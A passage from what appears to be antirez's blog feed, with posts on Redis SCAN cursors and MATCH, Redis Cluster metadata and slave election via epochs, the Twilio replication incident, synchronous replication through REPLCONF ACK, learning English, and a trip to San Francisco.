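def next_cursor(cursor, bits):
    # Reverse, add one, reverse back: a binary increment performed
    # starting from the most significant bit.
    return reverse_bits(reverse_bits(cursor, bits) + 1, bits)

cursor = 0
for _ in range(8):
    print(cursor)                    # with bits=3: 0, 4, 2, 6, 1, 5, 3, 7
    cursor = next_cursor(cursor, 3)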

So with the code merged into unstable, I tried to generalize the implementation in order to work with all the other Redis types that can be iterated this way, that is, Hashes, Sets and Sorted Sets, in the form of additional commands named HSCAN, SSCAN, ZSCAN.

You may wonder why we have a ZSCAN. The reason is that, while sorted sets are iterable in other ways, the specific properties of the SCAN iterator are not trivial to simulate by scanning elements by rank or score. Moreover sorted sets are internally implemented with a skip list and a hash table, so we already had the hash table, and extending SCAN to sorted sets was trivial.

Patterns too!
===

SCAN and its variants can be used with the MATCH option in order to only return elements matching a pattern. I’m also implementing the TYPE option in order to only return keys of a specific type.

This is almost for free, since SCAN does not guarantee to return elements at all: what happens is that it scans something like 10 buckets of the hash table per call (by default, you can change this) and later filters the output. Even if the return value contains no elements, you keep iterating as long as the returned cursor is non-zero.

As you can see this is something you could do client-side as well, by matching the returned elements against a pattern, but it is much faster to do it server-side, given that it is a very common need, and one that users are already used to because of the KEYS command. And of course it requires less I/O, if the pattern only matches a small number of elements.

This is an example:

redis 127.0.0.1:6379> scan 0 MATCH key:1*
1) "52"
2) 1) "key:13"
2) "key:12"
3) "key:14"
redis 127.0.0.1:6379> scan 52 MATCH key:1*
1) "9"
2) 1) "key:16"
2) "key:17"
3) "key:15"
4) "key:11"
redis 127.0.0.1:6379> scan 9 MATCH key:1*
1) "59"
2) 1) "key:10"
2) "key:1"
3) "key:18"
redis 127.0.0.1:6379> scan 59 MATCH key:1*
1) "0"
2) 1) "key:19"

In the last call the returned cursor is 0, so we ended the iteration.
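
Client-side the same iteration looks like this (again a sketch with the redis-py client, reusing the connection r from the earlier sketch):

cursor = 0
while True:
    cursor, keys = r.scan(cursor, match="key:1*")
    # An empty reply is normal: keep iterating while the cursor is non-zero.
    for key in keys:
        print(key)
    if cursor == 0:
        break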

Excited about it? I've good news: this is going to be back-ported into 2.8, since it is completely self-contained code, so if it is broken it does not affect other stuff. Not just that: there are very big companies that have been using SCAN for some time now, so I'm confident it's pretty stable.

Enjoy iterating!

Discuss this blog post on Hacker News: https://news.ycombinator.com/item?id=6633091
New Redis Cluster meta-data handling http://antirez.com/news/62 http://antirez.com/news/62 Thu, 26 Sep 2013 15:46:48 +0000
Let's start with the problem to solve. Redis Cluster uses a master - slave design in order to recover from nodes failures. The key space is partitioned across the different masters in the cluster, using a concept that we call "hash slots". Basically every key is hashed into a number between 0 and 16383. If a given key hashes to 15, it means it is in the hash slot number 15. These 16k hash slots are split among the different masters.
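
For reference, the hash function is a CRC16 of the key, taken modulo 16384. A quick sketch in Python (a naive bit-by-bit CRC16 with the XMODEM polynomial, which is what Redis Cluster uses):

def crc16(data):
    # Naive bit-by-bit CRC16-XMODEM: polynomial 0x1021, initial value 0.
    crc = 0
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc

def hash_slot(key):
    return crc16(key) % 16384

print(hash_slot(b"foo"))   # a slot number between 0 and 16383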

At any single time only one master should serve a given hash slot. Slaves just replicate the master dataset, so that it is possible to fail over a master and put the cluster back into a usable state where every hash slot is served by a node.

Redis Cluster is client assisted and nodes are not capable of forwarding queries to other nodes. However nodes are able to redirect a client to the right node every time it tries to access a key that is served by a different node. This means that every node in the cluster should know the map between the hash slots and the nodes serving them.

The problem I was trying to solve is: how do we keep this map in sync between nodes in a safe way? A safe way means that even in the event of net splits, eventually all the nodes will agree about the hash slot configuration.

Another problem to solve was slave promotion. A master can have multiple slaves: how do we detect, and how do we act, when a master is failing and a slave should be promoted to replace it?

Metadata is not data
====================

In Redis Cluster the handling of metadata is significantly different from the way the user data itself is handled. The focus of Redis Cluster is:

1) Speed.
2) No need for merge operations, so that it is semantically simple to handle the very large values typical of Redis.
3) The ability to retain most writes originating from clients connected to the majority of masters.

Given these priorities, Redis Cluster, like the vanilla single-node version of Redis, uses asynchronous replication, where changes to the data set are streamed to slave nodes with an asynchronous acknowledgement from slaves. In other words, when a node receives a write, most of the time the client talks directly with the node in charge of the key's hash slot, and that node has no other chatting to do with other nodes.

However this means that Redis Cluster is not a true CP system: there is a window where writes can be lost. The trivial way to lose a write is to write to a master that stops working after accepting our write and replying to the client, but before being able to propagate the write to its slaves.

This window is very small, in the sub-millisecond range. However when a client is partitioned away from the majority of the master nodes there is a bigger window to lose data, as a partitioned master will continue to accept writes for some time, while on the majority side the same master may be failed over by a slave. So when the partition is fixed, the master will be reconfigured as a slave and the writes it accepted will be lost.

Apart from the replicas, a key is stored in a single master node, so there is no need to agree on or merge its value. Given the design, there is no need to use an agreement protocol in order to write or read data to/from the cluster. However metadata is a different story: we want every node to have a coherent vision of the cluster setup, and the right configuration to be eventually propagated to all the nodes even in the case of failures and network partitions.

Using an agreement algorithm
============================

The simplest way to solve such a problem is to use a consensus algorithm such as Paxos or Raft, and this was the direction I was going to take. However implementing consensus algorithms is hard. Actually it is so hard that often years are needed for implementations to stabilize.

At some point I noticed something that makes the work of Redis Cluster nodes simpler: information about hash slots is always idempotent. If hash slot 5 is served by A, and later, because the configuration changed, hash slot 5 is served by B, nodes don't need to know what happened in between; all they need to know is that the configuration for a hash slot was updated.

This changes everything, basically: agreement protocols keep a state machine synchronized by running the same sequence of operations on every node. If the state machine is deterministic, then the internal state will eventually be the same in all the nodes. However all the state Redis Cluster needs for a given slot can be embedded into a single packet.

Because of this we don't need a log of operations stored on disk, nor a way to make sure we fetched all the operations still not fetched, or to figure out what should be applied and what not: all the state can be copied in a single message. In short Redis Cluster does not require a full agreement protocol, so I stole just what I needed from Raft, and tried to figure out the rest.

Failure detection
=================

In order to see if a node has issues, Redis Cluster still uses the old algorithm that is based on gossip. Nodes inform other nodes about the state of a few random nodes using ping / pong packets. These ping / pong packets are in turn used to check if a node is reachable from the point of view of the sender of the ping. If the (informal) majority of masters agree that a given node is not reachable, then the node is flagged as failing. I said "informal" as there is no true agreement here, but simply:

1) Every node flags another node as failing if the majority of master nodes signaled the node as down within a given time range.
2) Every node removes the flag if the node is reachable again and is a slave, or a master that after some time is still serving slots from our point of view (it was not failed over).

The failure detection is completely informal and has the only property that eventually all the nodes will agree on the failure: either the majority of masters will mark the node as failing, resulting in a chain effect that will force all the other nodes to mark it as failing, OR there is no majority and, if the node is reachable again, everybody will clear the flag.

The point here is that the failure detection does not require any safety: it is only useful in order to trigger the safe part of the algorithm, that is, replacing the master with a slave and updating the cluster configuration.

Slave promotion
===============

Promoting a slave must be a safe operation, and one that should ensure that the configuration change is propagated across the cluster as soon as possible.

Slave promotion is up to the slaves and uses a mechanism very similar to the Raft leader election. This is what happens:

1) A slave detects its master is failing.
2) The slave will try to win the election in order to promote itself to master.
3) If it is successful, it will change its state and will advertise the new configuration.
4) If it is unsuccessful it will try again to win the election after some time.

Every slave will try to start the election at a slightly different time, in order to avoid a split brain condition that would require a new election. Redis Cluster uses a random delay that is driven by the number of seconds a slave was disconnected from the master, in order to favor slaves that were able to talk with the master more recently (slaves with data that is too old don't try to get elected at all).

Every cluster node has the concept of currentTerm as in Raft; it is called currentEpoch in Redis Cluster. Every node tries to have a currentEpoch that is the highest found among other nodes, so this information is always added to the ping / pong packet headers. Every time a node sees a currentEpoch of another node that is greater than its own epoch, it updates its currentEpoch.

The election is like Raft's: a slave that tries to get elected increments its currentEpoch and sends a failover-auth-request to every master, hoping to get its vote. Masters refuse to vote if the master of that slave is not failing from their point of view, or if the currentEpoch advertised by the slave is smaller than the currentEpoch of the receiving master.

Also, masters vote a single time for every epoch: this ensures that for every epoch we can have just a single winner, which is central both in the Raft algorithm and in the Redis Cluster slave election.
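
A sketch of the voting rule, with invented names (the real implementation lives in the cluster code and is more involved):

# State of a given master: its last vote, and its view of failing nodes.
last_vote_epoch = 0
failing_masters = {"A"}

def handle_failover_auth_request(slaves_master, slave_epoch):
    global last_vote_epoch
    if slaves_master not in failing_masters:
        return False               # we don't see that master as failing
    if slave_epoch <= last_vote_epoch:
        return False               # already voted in this epoch (or newer)
    last_vote_epoch = slave_epoch  # one vote per epoch
    return True

print(handle_failover_auth_request("A", 1))   # True: vote granted
print(handle_failover_auth_request("A", 1))   # False: already voted for epoch 1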

Basically, if a slave wins the election, it uses the epoch at which the election was won as the version of its configuration, and newer configurations always win over older configurations.

The configEpoch
===============

In order to make it clearer how this works, we need to add some more information. Basically every ping / pong packet does not just publish the currentEpoch, but also the configEpoch, that is, the epoch at which the master started to serve its set of hash slots. Initially, when a cluster is created, every master uses a configEpoch of zero. As failover events happen, there will be nodes with greater configEpoch values.

As in the old algorithm, the ping and pong packets also carry a bitmap with the hash slots served by a given node. Since every node knows the last observed configEpoch of every other node, it can detect configuration changes to incorporate.

For instance if node B claims to serve hash slot 5 that was previously served by node A, but the configEpoch of node B is greater than the configEpoch we have for A, then we accept the new configuration.
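
A sketch of this update rule (my illustration; the real node state is of course more complex):

# For every slot we remember the current owner and its configEpoch.
slots = {5: ("A", 3)}

def maybe_update_slot(slot, claimant, claimed_config_epoch):
    owner, epoch = slots[slot]
    # Newer configurations always win over older ones.
    if claimed_config_epoch > epoch:
        slots[slot] = (claimant, claimed_config_epoch)

maybe_update_slot(5, "B", 4)
print(slots[5])   # ('B', 4): B claimed the slot with a greater configEpoch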

The same mechanism is also used in order to reconfigure a reappearing master as a slave, or to reconfigure all the other slaves after a failover. The count of slots served by the old master will drop to zero, and the nodes will switch to being replicas of the node that is serving the slots now.

The real algorithm used has more details that don't change the semantics, but make everything more fluid in common cases. For example, after a slave wins an election it broadcasts a PONG to every node, in order to propagate the configuration change faster and to prevent other slaves from initiating a new, useless election.

Similarly, a master that was partitioned away from the majority for enough time (the same time needed to flag it as failing) stops accepting writes, and will not accept writes for a few more seconds even after the majority of masters is reachable again, in order to give the other nodes some time to inform it of configuration changes. This makes it less likely that a client with an old routing table will try, and succeed, to write to the returning master that is now failed over.

From the point of view of the code, the implementation requires a minor amount of new code, as everything was already implemented in the old algorithm, even if in a broken way: it was unsafe, but the basic abstractions and message formats were ok.

All in all I'm falling in love with distributed programming and I hope to learn more in the next weeks...
English has been my pain for 15 years http://antirez.com/news/61 http://antirez.com/news/61 Sun, 01 Sep 2013 15:46:14 +0000
[1] http://paulgraham.com/accents.html

A long story
---

I still remember me and sullivan (http://www.isg.rhul.ac.uk/sullivan/), both drunk in my home in Milan, trying to turn an attack I was working on back in 1998 into a post that was understandable for BUGTRAQ users, and this is the poor result we obtained: http://seclists.org/bugtraq/1998/Dec/79

Please note the "Instead all others" in the second sentence. I'm still not great at English but I surely improved over 15 years, and sullivan now teaches in US and UK universities, so I imagine he is totally fluent (spoiler warning: I'm still not). But here the point is: we were doing new TCP/IP attacks, but we were not able to freaking write a post about them in English. It was 1998 and I already felt extremely limited by the fact that I was not able to communicate, that I was not able to read technical documentation written in English without putting too much effort into the process of reading itself, so my brain was using like 50% of its energy just to read, and less was left to actually understand what I was reading.

However in one way or another I always accepted English as a good thing. I always advise people against translation efforts in the field of technology, since I believe it is much better to have a common language to document and comment source code, and actually obtaining the skills needed to understand written technical documentation in English is a simple effort for most people.

So starting from 1998 I slowly learned to fluently read English without making more effort compared to reading something written in Italian.
I even learned to write at the same speed I write stuff in Italian, even if I hit a local minimum in this regard, as you can see reading this post: basically I learned to write a broken subset of English very fast, which is usually enough to express my thoughts in the field of programming, but is not good enough to write about general topics. I don't know most of the words needed to refer to the objects you find in a kitchen, for example, or the grammar constructs needed to formulate complex sentences, hypothetical structures, and so forth. Since I now can communicate easily on the topics I care most about, and in a way that other people can more or less understand everything I write, the pressure to improve has diminished greatly… However I recently discovered that this was the least of my problems with English.

European English, that funny language
---

So while I managed to eventually write and read comfortably enough for my needs, I almost never experienced actual communication in an English speaking country until recently. Before that I always used English with other European (non-UK) people: French, German, Spanish people.
Now, the English spoken in these countries is the English spoken in English school lessons… Phonetically it has almost nothing to do with American or UK English. They say it is "BBC English" but actually it is not. It is a phonetically greatly simplified English that uses UK English grammar.

*That* version of English actually allows people from around the world to communicate easily. The basic grammar is trivial to grasp, and after a few months of practice you can talk. The sound of the words is almost the same in all the non-English-speaking countries of Europe. So it works great.

There is just one problem, it has nothing to do with the real English spoken in UK, US, Canada, and other countries where English is a native language.

English is a bit broken, after all
---

Now I've a secret for you, one that is everything but a secret, except nobody says it in the context of English VS The World: English is a broken language, phonetically.
In Italy we have a long history, but a very late political unification. Different regions speak different dialects, and people have super strong accents. Before 1950, when the "TV Language Unification" happened, everybody was still talking in their *dialects*, and Italian was only mastered by a small percentage of people. Sicilian itself, the language most spoken in my family, predates Italian by centuries (http://en.wikipedia.org/wiki/Sicilian_language).

Still, guess what, nobody has issues understanding someone from another region, or even from a Swiss canton. Italian is phonetically one of the simplest languages on earth, and is full of redundancy. It has, indeed, a low information entropy, and usually words are long, with a good mix of consonants and vowels in every word. There are no special rules to pronounce a word: if you know the sound of every single letter, plus the sound of a few special combinations of letters like "gl" and "sc", you can basically pronounce 99.9% of the words correctly when reading them for the first time.

The fact that people from different English speaking countries have issues communicating is already a big hint about how odd English is phonetically.
For instance, for me and many other non-native English speakers it is very, very hard to understand what the fuck a UK person is saying. North Americans are usually a lot simpler to understand.

Because of this "feature" of English, the problem for me is not just my accent, which is IMHO the simplest thing to fix if I put enough work into it, but the ability to understand what people are saying to me. IMHO the fact that Paul Graham refers to "accents" shows a bad attitude of UK/US people in this regard: hey guys, you are not understanding us, but we are not understanding what you say either, and it is hard to find people that, once your understanding limits are obvious, will try to slow down the pace of the conversation. Often, even if I say I did not understand, I'll get the same sentence repeated the same way, at the speed of light.

Learning written English as a first exposure is the killer
---

In my opinion one fact that made me so slow at learning English is that I started reading English without ever listening to it.
My brain is full of associations between written words and funny sounds that really don't exist in the actual language.
My advice is that if you are learning English now, start listening to spoken English as soon as possible.

The OS X "say" program is a good assistant: it is able to pronounce most English words in a decent way. NEVER learn a new word without learning how it sounds.

Introvert or extrovert?
---

One of the things that shocked me the most in my experience with the English language is how not mastering a language can turn you into an introvert. I'm an extrovert in Italy, where most people are extroverts, in Sicily, where there are even more extroverts, and inside my family, which is composed mostly of extroverts. I'm kind of an attention whore I guess (I hope I'm not, actually, but well, I'm very extroverted). Now, when I have to talk in English, I'm no longer an extrovert, because of the communication barrier, and I dread every time I have to go to a meeting or be introduced to another person. It is a nightmare.

It's too late, let's study English
---

English in my opinion is only simple grammatically, and it is a bad pick as a common language. However the reality is, it already won, there is no time to change it, and it is a great idea to learn to speak English better, even if this means putting a lot of effort into it. This is what I'm doing myself: I'm trying to improve.

Another reason I find myself really in need to improve my English is that in 10 years I'll likely no longer write code professionally, and a logical option is to switch to the management side of IT, or to handle big projects where you are not supposed to write the bulk of the code. Well, if you think you need English as a developer, you'll need it a lot more as you move into other divisions of a typical IT company, even if you "just" have to manage many programmers.

However, as a native English speaker you should really realize that a lot of people are making serious efforts to learn a language that is hard to learn: it is not a hobby, mastering English is a big effort that a lot of people are undertaking to make communication simpler. Not to mention how easy it is to regress in the learning process as soon as you stop talking / listening for a couple of weeks…

My long term hope is that sooner or later the different accents will converge into a standard, easy-to-understand one that the English speaking population can use as a lingua franca.
Twilio incident and Redis http://antirez.com/news/60 http://antirez.com/news/60 Tue, 23 Jul 2013 15:45:52 +0000
http://www.twilio.com/blog/2013/07/billing-incident-post-mortem.html

The problem was about a Redis server, since Twilio is using Redis to store the in-flight account balances, in a master-slave setup, with multiple slaves in different data centers for obvious availability and data safety concerns.

This is a short analysis of the incident, what Twilio can do and what Redis can do to avoid this kind of issues.

The first observation is that Twilio uses Redis, an in-memory system, in order to save balances, so everybody will say "WTF Twilio! Are you serious with your data?". Actually Redis uses memory to serve data and to internally manipulate its data structures, but the incident has *nothing to do* with the durability of Redis as a DB. In fact Twilio stated that they are using the append only file, which can be a very durable solution, as explained here: http://oldblog.antirez.com/post/redis-persistence-demystified.html

The incident is actually centered around two main aspects of Redis:

1) The replication system.
2) The configuration.

I'll address these two things in turn.

Analysis of the replication issue
===

Redis 2.6 always needs a full resynchronization between a master and a slave after a connection issue between the two.
Redis 2.8 addressed this problem, but is currently a release candidate, so Twilio had no way to use the new feature called "partial resynchronization".

Apparently the master became unavailable because many slaves tried to resynchronize at the same time.

Actually, given the way Redis works, a single slave or multiple slaves trying to resynchronize should not make a huge difference, since just a single RDB is created. If a second slave attaches while there is already a background save in progress to create the first RDB (used for the bulk data transfer), it is put in a queue together with the previous slave, and so forth for all the other slaves attaching. Redis will produce just a single RDB file.

However, what is true is that Redis may use additional memory when many slaves attach at the same time, since there are multiple output buffers "recording" the writes to transfer once the RDB file is ready. This is especially true in the case of replication over a WAN. In the Twilio blog post I read "multiple data centers", so it is possible that the replication process was slow in some cases.

The bottom line is, Redis normally does not need to slow down when multiple slaves are resynchronizing at the same time, unless something strange happens, like hitting the memory limit of the server with the master starting to swap, and/or problems with very slow disks (probably EC2?) so that creating the RDB starts to interfere with the ability to write to the AOF file.

However, issues writing to the AOF are a bit unlikely to be the cause, since during the AOF rewrite there is the same kind of disk I/O stress, with one thread writing a lot of data to the new AOF, and the other (main) thread logging every new write to the AOF. Everything considered, memory pressure seems more probable, but the Twilio engineers can comment with details about what happened; this will be a useful real-world data point for sure.

From the Twilio side, what is possible to do to minimize incidents is to understand exactly why the master is not able, with the current architecture, to survive many slaves resynchronizing without a serious loss of performance.

From the Redis side, well, we probably had to do our homework and provide partial resynchronization *a long time ago*. We finally have it in Redis 2.8, and it is very good that a few days ago I pushed the 2.8 release forward, skipping all the other pending features, which will be postponed to the next release. Now we have the first release candidate; in a few weeks this should be a release in the hands of users.

The configuration
===

The other obvious problem, probably the biggest one, was restarting the master with the wrong configuration.

Again, I think here there was a human error that was "helped" by a less than perfect Redis mechanism.

Basically up to Redis 2.6 you had CONFIG SET to change the configuration by hand, so it was possible for example to switch the system from RDB to AOF for more data safety with just:

redis-cli CONFIG SET appendonly yes

However you had to change the configuration file manually in order to ensure that the change would affect the instance after the next restart. Otherwise the change only exists in the current in-memory configuration, and a restart will bring you back to the old config.

Maybe this was not the case, but it is not unlikely that Twilio engineers modified the wrong redis.conf file or forgot to do it in some way.

Fortunately Redis 2.8 provides a better workflow for on-the-fly configuration changes, that is:

redis-cli CONFIG SET appendonly yes
redis-cli CONFIG REWRITE

Basically the config rewriting feature makes sure to change the currently used configuration file so that it contains the configuration changes applied with CONFIG SET, which is definitely safer.

In the end
===

I'll be happy to work with the Twilio engineers in the next weeks in order to understand the details and their requests and see how Redis can be improved to make incidents like this less likely to happen.

A real world test
===

I just tried to set up a master with AOF enabled, rotating disks, and a huge write load. The only trick is, it is entry-level bare metal hardware.

Then I put a steady load on it of 70k writes per second across 10 million keys.

Finally I tried to mass-resync four slaves from scratch, multiple times.

Results:

$ redis-cli -h 192.168.1.10 --latency-history
min: 0, max: 26, avg: 0.97 (1254 samples) -- 15.00 seconds range
min: 0, max: 5, avg: 0.66 (1287 samples) -- 15.00 seconds range
min: 0, max: 2, avg: 0.62 (1290 samples) -- 15.00 seconds range
min: 0, max: 1, avg: 0.47 (1307 samples) -- 15.01 seconds range
min: 0, max: 10, avg: 0.48 (1306 samples) -- 15.00 seconds range
min: 0, max: 1, avg: 0.47 (1310 samples) -- 15.01 seconds range
min: 0, max: 3, avg: 0.45 (1311 samples) -- 15.01 seconds range
min: 0, max: 10, avg: 0.48 (1305 samples) -- 15.01 seconds range
min: 0, max: 23, avg: 0.49 (1306 samples) -- 15.01 seconds range
min: 0, max: 3, avg: 0.47 (1307 samples) -- 15.01 seconds range
min: 0, max: 36, avg: 0.86 (1255 samples) -- 15.00 seconds range
min: 0, max: 6, avg: 1.05 (1246 samples) -- 15.01 seconds range
min: 0, max: 21, avg: 0.52 (619 samples)^C

As you can see there is no moment in which the server struggles with this load. During the test the load continued to be accepted at the rate of 70k writes/sec.

This test is in no way able to simulate the Twilio architecture, but the bottom line here is: Redis is supposed to handle this load well even with minimally capable hardware, so something odd happened, or there was a low memory condition, or there was the "EC2 effect", that is, some very poor disk performance that allowed memory pressure to build up.
San Francisco http://antirez.com/news/59 http://antirez.com/news/59 Sat, 15 Jun 2013 15:45:31 +0000
Reaching San Francisco
===

If you want to reach San Francisco from Sicily, there are no direct flights to help you. My flight was a Lufthansa flight from Catania to Munich, and then from Munich to San Francisco. This is a total of 15 hours of flight, plus the stop in Munich waiting for the second flight.

Unfortunately the first flight had a delay big enough that I lost my connection. My trip was already pretty short, just four days, and this issue cost me one day, reducing the total available time in SF to just 3 days... It's like going to the other side of the world just to have a coffee.

However it's very rewarding to see Germans having an issue with precision, so I blamed a lot of people with the heaviest of Sicilian accents... Just kidding :-) The reality is that the operators at the Catania airport, not paid by Lufthansa, said that among all the big operators Lufthansa is one of the best in terms of avoiding delays. Moreover in Munich I was "protected" in a nice enough hotel with good food and great beer.

I was not the only unlucky guy: there were three other North Americans headed to San Francisco who became my travel companions in no time, very cool people who allowed me to practice English some hours before reaching SF, recounted fun stories, and got drunk with me on the Munich -> SF flight.

Basically it's a long trip, and reaching the final destination is already an experience in itself. A direct flight would be much better: only one flight, and the process is "atomic", either you remain at the starting point or you get to the final destination, with no chance to remain halfway, unless the aircraft falls out of the sky ;-)

The city
===

I'm a "city guy". In Sicily I live near Catania, which, counting the whole conurbation, is like 1 million inhabitants: not a lot, but not a small town either. San Francisco from this point of view is like my ideal city: people outside, gardens, large streets, bike lanes, many places where you can have a meal, and shops.

The hotel, the Intercontinental on Howard street, was also great in every possible way, from the food to the staff, which was always very professional and willing to help. The only bad thing about the hotel was the gym: full of treadmills, no pull-up bar, no barbells. A strange conception of fitness... I had to survive many days without doing a single deadlift.

During my stay in SF I used a cab only two times, due to time constraints; I greatly enjoyed walking around the city.

The people
===

During my time in SF I had the pleasure to visit Pivotal (my company), Adroll, Apcera, Twitter, and to attend the Redis drink-up. I encountered an endless stream of smart *and* kind people, basically without exceptions. I assume that the SF guys not following The First Law Of Computing (that is, "don't be an asshole"), whom I have the pleasure to meet on Twitter from time to time, are a minority in the city.

Basically it is a fantastic environment where the focus is only on getting things done in a friendly way, without rigid and useless things like the need to reach the office at 8am, but also without the employee habit of disappearing at 5pm during a deployment just because it's time to go home.

This is my philosophy as well, and it resonates very well with the way I also work at home.

Another very positive aspect is that, in the companies I visited, I never saw many meetings happening. Most of the programmers were at their desks, working in a quiet enough environment. Basically it's not a coincidence that they get things done: there is the right setup, and my impression is that on average people work something like 40 hours per week, like in Europe. I often read that in the US it's more like 50 or 60 hours; probably not in SF, or maybe I'm just wrong.

Women
===

I must admit that unfortunately there are not many women writing code, on average. I was lucky enough to meet a couple of outstanding women writing code, but all in all the percentage is not higher than the one in Italy. This is somewhat frustrating: from my point of view SF represents in many ways the "future" of the tech industry, the way it will probably be in many places in a few years. It is disappointing that I don't see much improvement in that regard; at the same time I've no recipes to suggest to improve things. I don't think the solution is to give some specific gender-based advantage, but something should be done, for example in the context of the educational system.

Children
===

In three days I heard multiple times the same story of families moving to SF and returning to their homes in other parts of the US, Europe, India, or wherever, after a few months. I've no idea why this happens: from the outside it looks like a wonderful, civilized city.

At the same time, however, there is something odd with the fact that you can earn 100k per year or more, and as a single person end up without money saved at the end of the year. Probably that has something to do with the incompatibility between SF and families?

Also, the streets were full of people, but it was hard to encounter children or pregnant women; this is another thing that seems very strange to an outsider.

Food
===

Food was very good at my company, at the companies I visited (often for lunch), and when I met people in public places. The only thing I was not happy with was the Greek yogurt, which apparently is not the same stuff I usually purchase here (I use the Fage brand); in general yogurt was more of a dessert-looking thing.

Also, cereals were full of sugar, and people drink in one day the amount of Coke that in Sicily you drink in one year.

Fruit, especially apples and red fruits, were excellent, and the fruit & nuts bars completely awesome in some cases (I don't recall the brands I liked most).

The coffee is very different from the Italian one, but when it's made the right way it is fine for me, just not as coffee as I intend it, but as another thing. However, the side effect is that apparently you get a lot more caffeine with the amount you drink in those big cups, and this caused me some issues.

My English
===

Even if a few people reported that I improved compared to when we met the previous time, the reality is that my English was the only real pain point, again. UK people are especially hard for me to understand, and I guess the opposite is also true. Fixing your command of a language you don't practice is either impossible or requires a lot of time, so probably I'll start to travel more. For example, instead of always refusing the invitations, I think I'll go to conferences much more.

Conclusion
===

It's not the first time I've visited SF: I already visited the city once a few years ago, but this is the first time I moved around and met people freely, since on my last trip I stayed mainly in Palo Alto.

I think that even if the climate is a bit odd, I would stay in SF itself if I were to move to the Bay Area, even if it is probably going to be very expensive.

It really is a wonderful city, and I hope to return soon instead of waiting three years again.

I want to say thank you to everybody I met during my trip: you are very kind and friendly, and I enjoyed it.
Exploring synchronous replication in Redis http://antirez.com/news/58 http://antirez.com/news/58 Mon, 27 May 2013 15:45:08 +0000
I always took that almost for granted, as I always assumed Redis was not a good match for synchronous replication, which has a higher latency. However recently I tried to fix another issue with Redis replication, that is, the fact that timeouts are all up to the slave.

This is how it used to work:

1) The master sends data to slaves. However sometimes there is no data to send (no write traffic). We still need to send something to slaves in order to avoid slaves detecting a timeout.
2) So a master periodically sends PINGs to slaves as well, every 10 seconds by default.
3) Detection of a broken replication link is up to the slaves, which close the connection when a timeout is detected.
4) Masters are able to detect errors in the replication link only when reported by the operating system as a socket error.

So the ability of masters to detect errors in the replication link was pretty limited in Redis 2.6, and this is BAD. There are many kinds of broken links that raise no error in the socket, but we still end up accumulating writes for a slave that is down. The only defense against this was the ability of Redis 2.6 to detect when the output buffer was too big, and close the connection before using all the available memory for slave output buffers.

Pinging back
===

In order to fix this issue the most natural thing to do is to also ping from slave to master, so that the master can be aware of the slaves. Otherwise there is zero slave -> master communication, as slaves don't reply in any way to the write commands sent by a master, to save bandwidth.

However I was not very happy with sending just PING, since it was possible to send something way more useful, that is, the current *replication offset*. The replication offset is a new concept we have in 2.8 with PSYNC. Basically every master has a 64 bit global counter of how much replication stream it has produced. Moreover the replication stream is identical for all the slaves, so every slave shares the same global replication offset with the master.

The replication offset is primarily used by PSYNC, so that slaves can request a partial resynchronization asking the master to send data starting from a given offset, that is, the last offset that the slave received.

So instead of sending PINGs I made slaves ping the master with a new command:


REPLCONF ACK <offset>

This way the master is aware of the amount of replication stream processed by every slave so far, and as a result it knows the "lag" of each slave. This is how it looks when we ask the master for "INFO replication":

$ redis-cli info replication
# Replication
role:master
connected_slaves:1
slave0:127.0.0.1,6380,online,121483
master_repl_offset:121483
repl_backlog_active:1
repl_backlog_size:1048576
repl_backlog_first_byte_offset:2
repl_backlog_histlen:121482

As you can see the offset (last element) of slave0 is the same as master_repl_offset. So the slave is perfectly aligned.

Great, so far so good, but wait, isn't this half of what you need to implement synchronous replication?

Synchronous replication the easy way
===

So if we know the offset a slave has processed so far, we could implement a new feature in Redis transactions, like this:


MULTI
MINREPLICAS 3 60
SET foo bar
EXEC

Here MINREPLICAS would tell Redis: make the commands return only when my write has reached the master and at least two slaves.
The first argument is the number of replicas, the second is a timeout, as we can't wait forever if there are not enough slaves accepting the write.

Implementing this is simple:

1) After the master processes the command, we save the current replication offset.
2) We also send REPLCONF GETACK to every slave in order to receive an ACK ASAP (otherwise sent every second).
3) We block the client, similarly to what happens when BLPOP is called.
4) As soon as we receive enough ACKs from slaves that N replicas have an offset >= the one we saved, we unblock the client.

Cool right? Synchronous replication almost for free, not affecting the other commands at all, and so forth.
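
This is a sketch of the unblocking rule (invented helper names, and polling instead of the event-driven unblocking Redis would actually use):

import time

# Refreshed as REPLCONF ACK packets arrive from the slaves.
slave_acked_offsets = {"slave1": 1200, "slave2": 950, "slave3": 700}

def replicas_at_offset(target_offset):
    # How many replicas acknowledged at least target_offset?
    return sum(off >= target_offset for off in slave_acked_offsets.values())

def wait_for_replicas(target_offset, min_replicas, timeout):
    # Block the client until enough replicas acked, or the timeout fires.
    deadline = time.time() + timeout
    while time.time() < deadline:
        if replicas_at_offset(target_offset) >= min_replicas:
            return True
        time.sleep(0.01)
    return False

print(wait_for_replicas(900, 2, 1.0))   # True: two slaves are at offset >= 900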

No rollbacks, no fun?
===

There is a problem however: what happens if the timeout is reached and we still did not reach N replicas?

In Redis we don't have rollbacks, and I don't want to add this feature as rollbacks with complex big values are hard to implement, very costly, and will make everything too complex for my current tastes.

So, the write will *anyway* reach the master and a number of slaves smaller than N-1, even if the transaction was not able to honor the requested MINREPLICAS count. However we can notify the user of the number of replicas reached as the first element of the MULTI/EXEC reply. This way the user may roll back manually if he wishes, or retry, assuming the write is idempotent…

I wonder if the feature is still useful without rollbacks.

Alternatives
===

There is an alternative: now that we are able to sense slaves, we may implement a much weaker form of check that could still be very useful in practical systems, that is:

MINREPLICAS <numreplicas> <max-idle>

Where I ask Redis to *start* the transaction only if there are at least <numreplicas> slaves connected, with an idle time in the last ACK that is less than the specified <max-idle>. This does not guarantee that the write will be propagated to N replicas, as there is an obvious window, but we'll be sure that if slaves get disconnected or blocked in some way, after some time (chosen by the user) writes will no longer be accepted.

What we have now
===

Slaves sending ACKs back to the master entered the 2.8 branch (as it was basically a bug fix), so the different possibilities are open for the future, but currently I don't feel it is the right time to implement synchronous replication in Redis without thinking more about the behavior of the feature. However, the fact that the underlying mechanism is so simple is tempting...
Availability on planet Terah http://antirez.com/news/57 http://antirez.com/news/57 Tue, 21 May 2013 15:42:35 +0000
The inhabitants of this strange planet use two database systems. One is imported from planet Earth via the Galactic Exchange Program, and is called EDB. The other is produced by engineers from Terah, and is called TDB. The databases are functionally equivalent, but they have different semantics when a network partition happens. While the database from Earth stops accepting writes as long as it is not connected with the majority of the other database nodes, the database from Terah works as long as the majority of the clients can reach at least a database node (incidentally, the author of this story released a similar software project called Sentinel, but this is just a coincidence).

